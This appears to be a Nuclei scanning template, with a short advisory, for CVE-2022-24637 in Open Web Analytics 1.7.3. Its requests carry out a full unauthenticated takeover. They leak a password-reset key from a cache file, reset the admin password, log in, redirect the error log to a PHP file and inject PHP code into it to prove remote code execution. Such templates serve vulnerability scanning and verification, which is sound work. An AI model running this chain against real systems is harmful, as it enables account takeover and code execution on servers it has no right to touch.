Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
PoC代码[已公开]
id: CVE-2022-24637
info:
name: Open Web Analytics 1.7.3 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
impact: |
Unauthenticated attackers can exploit improperly handled PHP files to obtain cache hashes containing sensitive user information, then leverage these to reset the admin password and upload malicious files for remote code execution, compromising the entire analytics platform.
remediation: |
Upgrade to Open Web Analytics version 1.7.4 or later that properly handles PHP file generation and validates authentication for sensitive operations.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/open_web_analytics_rce.rb
- http://packetstormsecurity.com/files/171389/Open-Web-Analytics-1.7.3-Remote-Code-Execution.html
- https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/tag/1.7.4
- https://github.com/Pflegusch/CVE-2022-24637
- https://github.com/c0derpwner/HTB-pwned
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24637
cwe-id: CWE-269
epss-score: 0.93978
epss-percentile: 0.9988
cpe: cpe:2.3:a:openwebanalytics:open_web_analytics:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
vendor: openwebanalytics
product: open_web_analytics
shodan-query: cpe:"cpe:2.3:a:openwebanalytics:open_web_analytics"
tags: cve,cve2022,packetstorm,rce,intrusive,open-web-analytics,vuln
variables:
password: "{{randbase(8)}}@123!"
secret: "{{randstr}}"
secret_b64: "{{base64(secret)}}"
flow: |
http(1);
http(2);
javascript();
http(3);
http(4); http(5); http(6); http(7);
javascript:
- code: |
idx=serobj.indexOf('temp_passkey');
passubstr=serobj.substring(idx,idx+120);
temp_pass=(passubstr.match(/s:32:"([a-f0-9]{32})"/)[1])
temp_pass
args:
serobj: "{{base64_decode(serializedobj)}}"
http:
- raw:
- |
POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
owa_user_id=admin&owa_password=wrong+password+xyz&owa_go=&owa_action=base.login&owa_submit_btn=Login
matchers:
- type: word
part: body
words:
- "Login Failed"
internal: true
- raw:
- |
GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: serializedobj
internal: true
regex:
- '<\?php\\n\/\*([A-Za-z0-9=]+)\*\/\\n\?>'
matchers:
- type: word
part: body
words:
- <?php\n
internal: true
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
owa_password={{password}}&owa_password2={{password}}&owa_k={{javascript_response}}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password
matchers:
- type: dsl
dsl:
- "contains(location,'owa_status_code=3006')"
- "status_code==302"
internal: true
condition: and
- raw:
- |
POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
owa_user_id=admin&owa_password={{password}}&owa_go=&owa_action=base.login&owa_submit_btn=Login
matchers:
- type: dsl
dsl:
- "contains(set_cookie,'owa_p')"
- "status_code==302"
internal: true
condition: and
- raw:
- |
GET /index.php?owa_do=base.optionsGeneral HTTP/1.1
Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: nonce
internal: true
regex:
- 'name="owa_nonce" value="([a-z0-9]+)">'
- raw:
- |
POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
Host: {{Hostname}}
Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
Content-Type: application/x-www-form-urlencoded
owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2
- raw:
- |
POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
Host: {{Hostname}}
Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
Content-Type: application/x-www-form-urlencoded
owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[shell]=<?php+echo base64_decode('{{secret_b64}}');?>
- |
GET /owa-data/caches/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '[debug_log]'
- "{{secret}}"
condition: and
# digest: 4b0a00483046022100e2bd6933ab5e03bc4e4163c0523af3a70e8353cce4d8cdb2b91b73aac7f65e57022100c94e3ee3bd1773ccb87a1af6001afa796749bb4e5d7301b813ac635984903698:922c64590222798bb761d5b6d8e72950